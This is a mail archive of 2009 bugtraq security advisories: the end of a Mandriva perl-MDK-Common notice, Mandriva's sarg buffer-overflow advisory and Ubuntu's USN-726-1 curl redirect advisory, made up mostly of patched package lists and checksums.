dc24b24dbf8a233cbd10f92ab8a3f5a4 corporate/3.0/SRPMS/perl-MDK-Common-1.1.11-3.1.C30mdk.src.rpm
Corporate 4.0:
b53e8db2c3804b36c17921bd886b2c23 corporate/4.0/i586/perl-MDK-Common-1.1.24-1.1.20060mlcs4.i586.rpm
72122ed2463be591ea5c8d3763aaac1a corporate/4.0/i586/perl-MDK-Common-devel-1.1.24-1.1.20060mlcs4.i586.rpm
97b7bbf36c56e079497bb15a38cdd06e corporate/4.0/SRPMS/perl-MDK-Common-1.1.24-1.1.20060mlcs4.src.rpm
Corporate 4.0/X86_64:
5476a172d15b9985491cee4b5ba914d4 corporate/4.0/x86_64/perl-MDK-Common-1.1.24-1.1.20060mlcs4.x86_64.rpm
ecea123e2aad11416a8abd079a5b93ec corporate/4.0/x86_64/perl-MDK-Common-devel-1.1.24-1.1.20060mlcs4.x86_64.rpm
97b7bbf36c56e079497bb15a38cdd06e corporate/4.0/SRPMS/perl-MDK-Common-1.1.24-1.1.20060mlcs4.src.rpm
Multi Network Firewall 2.0:
d1b3d790798d9252553c95e4fe1e90e9 mnf/2.0/i586/perl-MDK-Common-1.1.11-3.1.C30mdk.i586.rpm
219d2d7cf2b4c745b2952ee75a2009e1 mnf/2.0/i586/perl-MDK-Common-devel-1.1.11-3.1.C30mdk.i586.rpm
f2c76192a4d62ae3702de73abda0884e mnf/2.0/SRPMS/perl-MDK-Common-1.1.11-3.1.C30mdk.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFJt+NbmqjQ0CJFipgRAvINAKC3d7iuv+HEVUIRh2Rn8BggyZ10rACfX9f1
UXe9rhwuBhlRn6iP5nwztoE=+T8R
-----END PGP SIGNATURE-----
From - Thu Mar 12 11:51:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006915
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39722-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id B1918ED787
for <lists@securityspace.com>; Thu, 12 Mar 2009 11:44:41 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 374A214372D; Thu, 12 Mar 2009 08:13:43 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 31753 invoked from network); 11 Mar 2009 21:45:13 -0000
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:073 ] sarg
Date: Wed, 11 Mar 2009 22:45:01 +0100
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LhWEX-000361-Ff@titan.mandriva.com>
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2009:073
http://www.mandriva.com/security/
_______________________________________________________________________
Package : sarg
Date : March 10, 2009
Affected: 2008.0, Multi Network Firewall 2.0
_______________________________________________________________________
Problem Description:
Various stack buffer overflows were discovered and corrected in sarg:
Additionally the previous release fixed CVE-2008-1922
The updated packages have been patched to correct these issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1922
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2008.0:
15220d1d19df7866158faf5691091db1 2008.0/i586/sarg-2.2.5-0.3mdv2008.0.i586.rpm
e90b1965c741b0411cc26dc0a3076f43 2008.0/SRPMS/sarg-2.2.5-0.3mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
72be1a3b7331854ec27678985fa11fa9 2008.0/x86_64/sarg-2.2.5-0.3mdv2008.0.x86_64.rpm
e90b1965c741b0411cc26dc0a3076f43 2008.0/SRPMS/sarg-2.2.5-0.3mdv2008.0.src.rpm
Multi Network Firewall 2.0:
a16192924303d6a30611345c0cdd5226 mnf/2.0/i586/sarg-2.2.5-0.2.M20mdk.i586.rpm
076cfa3458dbc3c71eda0ccfe948c7fb mnf/2.0/SRPMS/sarg-2.2.5-0.2.M20mdk.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFJuAW5mqjQ0CJFipgRAsT4AJ9w/38BPgfFfnwBIVKWC+Z5piSEXACeNAKl
Unu1AVagIifyvkrR/7PV/ZI=aSyT
-----END PGP SIGNATURE-----
From - Thu Mar 12 12:01:14 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006916
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39730-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 4349CED501
for <lists@securityspace.com>; Thu, 12 Mar 2009 11:53:53 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id B2DB1237533; Thu, 12 Mar 2009 08:16:40 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17484 invoked from network); 12 Mar 2009 12:31:21 -0000
Delivered-To: unknown
X-Bluewin-Spam-Analysis: v=1.0 c=1 a�6q0cyCUc8QNek+tXvRSQ==:17 a=fxJcL_dCAAAA:8 a=OyHcUBRH04IW4ol2diAA:9 a=uHvUuZ9nVv53fTq_MNzbFbL44EYA:4 a=tQPsmlJHCTUA:10
X-Bluewin-Spam-Score: 0
X-FXIT-IP: IPv4[91.189.94.204] Epoch[1236109853]
Subject: [USN-726-1] curl vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound: uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -17.9
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.69.0.146
Date: Tue, 03 Mar 2009 14:44:12 -0500
Message-Id: <1236109452.6589.18.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.25.91
X-Mailman-Approved-At: Tue, 03 Mar 2009 19:48:25 +0000
Cc: full-disclosure@lists.grok.org.uk,
"bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
X-BeenThere: ubuntu-security-announce@lists.ubuntu.com
X-Mailman-Version: 2.1.8
Reply-To: ubuntu-users@lists.ubuntu.com,
Ubuntu Security <security@ubuntu.com>
Content-Type: multipart/mixed; boundary="==============�12105205218476806=="
Mime-version: 1.0
Sender: ubuntu-security-announce-bounces@lists.ubuntu.com
Errors-To: ubuntu-security-announce-bounces@lists.ubuntu.com
Status:
--==============�12105205218476806=Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-vVlpg2N7rxwQ1FwKUF+4"
--=-vVlpg2N7rxwQ1FwKUF+4
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
===========================================================
Ubuntu Security Notice USN-726-1 March 03, 2009
curl vulnerability
CVE-2009-0037
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
libcurl3 7.15.1-1ubuntu3.1
libcurl3-gnutls 7.15.1-1ubuntu3.1
Ubuntu 7.10:
libcurl3 7.16.4-2ubuntu1.1
libcurl3-gnutls 7.16.4-2ubuntu1.1
Ubuntu 8.04 LTS:
libcurl3 7.18.0-1ubuntu2.1
libcurl3-gnutls 7.18.0-1ubuntu2.1
Ubuntu 8.10:
libcurl3 7.18.2-1ubuntu4.1
libcurl3-gnutls 7.18.2-1ubuntu4.1
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
It was discovered that curl did not enforce any restrictions when following
URL redirects. If a user or automated system were tricked into opening a URL to
an untrusted server, an attacker could use redirects to gain access to abitrary
files. This update changes curl behavior to prevent following "file" URLs after
a redirect.
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1.diff.gz
Size/MD5: 187821 98a6bc2adb5c5673bdf39e10459be0e8
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1.dsc
Size/MD5: 946 54356fc9d1f2f629db92aec10f15ad52
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1.orig.tar.gz
Size/MD5: 1769992 63be206109486d4653c73823aa2b34fa
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dev_7.15.1-1ubuntu3.1_all.deb
Size/MD5: 31260 e1a1c7938bbc15a8f1183fe1d6d0af0a
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1_amd64.deb
Size/MD5: 169568 1315f552c57d7db1315f81b41589792c
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.15.1-1ubuntu3.1_amd64.deb
Size/MD5: 540736 bb54db6af7f71e8098b99f57c55a8c03
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls-dev_7.15.1-1ubuntu3.1_amd64.deb
Size/MD5: 717326 74244221991d13b3e27d7600b25cc667
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.15.1-1ubuntu3.1_amd64.deb
Size/MD5: 167960 0d960ee5cb9c386af7730dd6985e519e
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-openssl-dev_7.15.1-1ubuntu3.1_amd64.deb
Size/MD5: 724246 a35139c3af268cb40a64b2d4562c239e
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.15.1-1ubuntu3.1_amd64.deb
Size/MD5: 172910 33529da99980d7c599c1ddbf49a7a298
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1_i386.deb
Size/MD5: 168448 3ff82ec8fbffb489c198ef86ad45155b
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.15.1-1ubuntu3.1_i386.deb
Size/MD5: 506770 10c355570dcb3812efa661f3359792fa
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls-dev_7.15.1-1ubuntu3.1_i386.deb
Size/MD5: 700624 d9ed3ac37839ed446dd2d19f4c0ccac1
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.15.1-1ubuntu3.1_i386.deb
Size/MD5: 160502 7325d0cd0802f12340de1e5ff8fc94ad
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-openssl-dev_7.15.1-1ubuntu3.1_i386.deb
Size/MD5: 705276 442b603f3bef1bb6b76cb475108d0869
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.15.1-1ubuntu3.1_i386.deb
Size/MD5: 165456 52191a45a9ccfb55dfa95a5d6059c4c4
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1_powerpc.deb
Size/MD5: 172084 3b8d50cd83bce1fbf4db132ac6b5fcf2
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.15.1-1ubuntu3.1_powerpc.deb
Size/MD5: 542256 f038486866f70fd91641a338684c9fd7
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls-dev_7.15.1-1ubuntu3.1_powerpc.deb
Size/MD5: 723702 ab81371909385b48de743ff8c6bdef1e
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.15.1-1ubuntu3.1_powerpc.deb
Size/MD5: 170316 b131cc76e2315a6969e5d842ee00ac7d
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-openssl-dev_7.15.1-1ubuntu3.1_powerpc.deb
Size/MD5: 729156 ecb7523175cc86845a65a45e584c52f4
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.15.1-1ubuntu3.1_powerpc.deb
Size/MD5: 174808 75929f5b8f8665d595d71b1477428fe8
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.15.1-1ubuntu3.1_sparc.deb
Size/MD5: 169262 d1227121940771c773000adf86cb2b25
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.15.1-1ubuntu3.1_sparc.deb
Size/MD5: 510838 cedeacff8c06c39c973cb49e14098a72
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls-dev_7.15.1-1ubuntu3.1_sparc.deb
Size/MD5: 710240 a69b147b9aa4e84755128b20cf8d6cc0
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.15.1-1ubuntu3.1_sparc.deb
Size/MD5: 163088 2dc3c7c08147eb59e3b10df00a84380d
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-openssl-dev_7.15.1-1ubuntu3.1_sparc.deb
Size/MD5: 714840 ef9596a90e8f5d3872dbb533c2e3a785
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.15.1-1ubuntu3.1_sparc.deb
Size/MD5: 167244 0eb1ef9b9f24c1ce216bfac5ac61a770
Updated packages for Ubuntu 7.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1.diff.gz
Size/MD5: 23038 ec29fe4a6ce15381ee4d18977a01cf54
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1.dsc
Size/MD5: 1070 ee6f69c49d16d34809984d41ba9a95d9
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4.orig.tar.gz
Size/MD5: 2127522 b8f272cfe98fd5570447469e2faea844
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1_amd64.deb
Size/MD5: 175802 1031a8edbe06cac94c392dedc7453fe5
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.16.4-2ubuntu1.1_amd64.deb
Size/MD5: 1030904 97008fb6866a84bfc1bfc6aadc387c37
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.16.4-2ubuntu1.1_amd64.deb
Size/MD5: 180212 8879fd596ec6d374ecc3db7c590a4dee
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.16.4-2ubuntu1.1_amd64.deb
Size/MD5: 186854 216542e4ee0aa37b12dfceb9f782431f
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.16.4-2ubuntu1.1_amd64.deb
Size/MD5: 828040 3bef020322ca21c8673b55bcde5a7555
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.16.4-2ubuntu1.1_amd64.deb
Size/MD5: 835418 03a845d4637949826e4b606675643351
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1_i386.deb
Size/MD5: 174936 a69d59cba07ca9611470fa45c441d41f
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.16.4-2ubuntu1.1_i386.deb
Size/MD5: 998270 4adafc7307dec5a9194e53d27046862a
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.16.4-2ubuntu1.1_i386.deb
Size/MD5: 176140 63ce96a012b6b57e14ada06f633293f8
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.16.4-2ubuntu1.1_i386.deb
Size/MD5: 182128 cc373dd8b1383abc9647b2755dcc82c2
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.16.4-2ubuntu1.1_i386.deb
Size/MD5: 802764 b4f2f06c793123ffc85ecd754d27a799
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.16.4-2ubuntu1.1_i386.deb
Size/MD5: 808706 4cdc8ddd315dbd125b6dd6fd9254f584
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/c/curl/curl_7.16.4-2ubuntu1.1_lpia.deb
Size/MD5: 174826 826bd0dc3bab6c9df46b737c99a4cc12
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.16.4-2ubuntu1.1_lpia.deb
Size/MD5: 1016026 54999bbac5f7b80c03a450d0fa782e2c
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.16.4-2ubuntu1.1_lpia.deb
Size/MD5: 174294 4b881eab13f96f101f233b8d8066a1eb
http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.16.4-2ubuntu1.1_lpia.deb
Size/MD5: 180832 7e9738237d5a15b0117463d9c9067925
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.16.4-2ubuntu1.1_lpia.deb
Size/MD5: 800482 8f79859acd3d9c5656c8776bd595aa17
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.16.4-2ubuntu1.1_lpia.deb
Size/MD5: 806612 d310180304c4688ad36b734a929514aa
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1_powerpc.deb
Size/MD5: 179486 e0fb5643133b30cc3e258820cf17d67d
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.16.4-2ubuntu1.1_powerpc.deb
Size/MD5: 1045612 845b188923e649bc8a165b8356e7f406
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.16.4-2ubuntu1.1_powerpc.deb
Size/MD5: 187794 cd8cd13657a67c0367bae7c821075cbb
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.16.4-2ubuntu1.1_powerpc.deb
Size/MD5: 193612 d4178d220ba2d1e12005387e9226a27b
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.16.4-2ubuntu1.1_powerpc.deb
Size/MD5: 826054 ce04418fbb88124acc4705e9372ecd30
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.16.4-2ubuntu1.1_powerpc.deb
Size/MD5: 831906 3a8efee4daf4b2ca73165bd2ec1e2883
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.16.4-2ubuntu1.1_sparc.deb
Size/MD5: 175644 6b184238aa16330227fa2ef555b6e558
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.16.4-2ubuntu1.1_sparc.deb
Size/MD5: 990958 66b0b3669cba60f631ed6a0a24617188
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.16.4-2ubuntu1.1_sparc.deb
Size/MD5: 174762 e8750cc8896cfcffce4815777ac3caee
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.16.4-2ubuntu1.1_sparc.deb
Size/MD5: 179512 c0e79f63b732fbbc405652f107878b84
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.16.4-2ubuntu1.1_sparc.deb
Size/MD5: 808072 684fb0a815911676557b5debd393a1fe
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.16.4-2ubuntu1.1_sparc.deb
Size/MD5: 814506 1aa48c17a5be7a7373b045abfc18da3d
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.0-1ubuntu2.1.diff.gz
Size/MD5: 23694 d86f917e0253ba822db6d2424798463c
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.0-1ubuntu2.1.dsc
Size/MD5: 1101 1a3e33be24181c7ffc8f7b60816e249d
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.0.orig.tar.gz
Size/MD5: 2285430 76ff5a7fa2e00b25ded5302885d4c3e2
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.0-1ubuntu2.1_amd64.deb
Size/MD5: 197866 101c380ab9d9ab90cd8eb29feb9b1afc
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.18.0-1ubuntu2.1_amd64.deb
Size/MD5: 1054384 bc98cdd6d1571106757d2411ad6ffd3c
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.18.0-1ubuntu2.1_amd64.deb
Size/MD5: 202642 f663841bc8e03556b2d41ef1d7260930
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.18.0-1ubuntu2.1_amd64.deb
Size/MD5: 209456 e8acd7503ad26b01aae5375b90178a48
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.18.0-1ubuntu2.1_amd64.deb
Size/MD5: 896296 fd68ba64689210d59e867787ba4abb20
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.18.0-1ubuntu2.1_amd64.deb
Size/MD5: 904552 7644776a5d3a3b1922a3507a37ec05dc
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.0-1ubuntu2.1_i386.deb
Size/MD5: 197074 00eb30ecbc6793f1d10bed5c8bbf5bf5
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.18.0-1ubuntu2.1_i386.deb
Size/MD5: 1039734 541d32169bfe1529dd2d4745a1226eb1
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.18.0-1ubuntu2.1_i386.deb
Size/MD5: 198480 b4ca187d0408dc35836646c5f966bf90
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.18.0-1ubuntu2.1_i386.deb
Size/MD5: 205782 c61cf64efc7baa7cb37a03bed19cfa6a
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-gnutls-dev_7.18.0-1ubuntu2.1_i386.deb
Size/MD5: 870314 7e275b66161a6cf9c32fbdc4750805eb
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl4-openssl-dev_7.18.0-1ubuntu2.1_i386.deb
Size/MD5: 877390 b8889ec5febb2da66b0dae49295e6844
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.0-1ubuntu2.1_lpia.deb
Size/MD5: 196994 f85f088f37ed84c756fd75a5ba9c1829
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.0-1ubuntu2.1_lpia.deb
Size/MD5: 1046972 f93a0314315ca010c1e000d6094b529e
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.0-1ubuntu2.1_lpia.deb
Size/MD5: 197474 bedb0ae75d50745d9070d598a7f3bbed
http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.0-1ubuntu2.1_lpia.deb
Size/MD5: 204090 7db96e2a1af5229b5c05fe332c30f756
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.0-1ubuntu2.1_lpia.deb
Size/MD5: 869990 16be192ab09c1ca78a48d50b599b6868
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.0-1ubuntu2.1_lpia.deb
Size/MD5: 876092 896c0bbc2eee392cbac4a18b5996931b
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.0-1ubuntu2.1_powerpc.deb
Size/MD5: 201932 c3f6e455e85ddc6e69daf3431ea58e74
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.0-1ubuntu2.1_powerpc.deb
Size/MD5: 1063946 a5d52c748048bf586cedb02daf29fb7a
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.0-1ubuntu2.1_powerpc.deb
Size/MD5: 210994 5602b8c0c9979c0eba7eff319d5bc77e
http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.0-1ubuntu2.1_powerpc.deb
Size/MD5: 216006 8d65ea79097e0e635f75382d7aaecf6b
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.0-1ubuntu2.1_powerpc.deb
Size/MD5: 895512 ef52c8d4b5a097751646d1174bca4c35
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.0-1ubuntu2.1_powerpc.deb
Size/MD5: 902650 dd88be6fee4e0382db0af0cc490877b0
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/c/curl/curl_7.18.0-1ubuntu2.1_sparc.deb
Size/MD5: 197586 db78b2c9b6402e0f9ed9cb9bf7cd4872
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-dbg_7.18.0-1ubuntu2.1_sparc.deb
Size/MD5: 1027024 0ead1406330f62ff04c0177d185a53a9
http://ports.ubuntu.com/pool/main/c/curl/libcurl3-gnutls_7.18.0-1ubuntu2.1_sparc.deb
Size/MD5: 196652 3e829cf092deb68935946eccb4471663
http://ports.ubuntu.com/pool/main/c/curl/libcurl3_7.18.0-1ubuntu2.1_sparc.deb
Size/MD5: 202218 ba4d43feba5bc66630d46766f1ae5dd3
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-gnutls-dev_7.18.0-1ubuntu2.1_sparc.deb
Size/MD5: 877208 20b30bf93d62e6c2c165ee6be374435f
http://ports.ubuntu.com/pool/main/c/curl/libcurl4-openssl-dev_7.18.0-1ubuntu2.1_sparc.deb
Size/MD5: 883238 66b2bc1ab0da39b981e35aaf694e6b67
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2-1ubuntu4.1.diff.gz
Size/MD5: 22211 6e74e8584ae7aebb6c14d3a114796454
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2-1ubuntu4.1.dsc
Size/MD5: 1491 9b355d2d245a85cbca121726652e7f8d
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2.orig.tar.gz
Size/MD5: 2273077 4fe99398a64a34613c9db7bd61bf6e3c
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.18.2-1ubuntu4.1_amd64.deb
Size/MD5: 210246 d67a5eb49a6f5e427bd1654007f455a7
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-dbg_7.18.2-1ubuntu4.1_amd64.deb
Size/MD5: 1124684 57f1830f3a2e4ffdec0180717f3191a0
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3-gnutls_7.18.2-1ubuntu4.1_amd64.deb
Size/MD5: 216106 e36ff6ee975146c248c293ce0f8cfc6b
http://security.ubuntu.com/ubuntu/pool/main/c/curl/libcurl3_7.18.2-1ubuntu4.1_amd64.deb
Size/MD5: 223206 56e2f570c4c989bca172cfc09a370d39
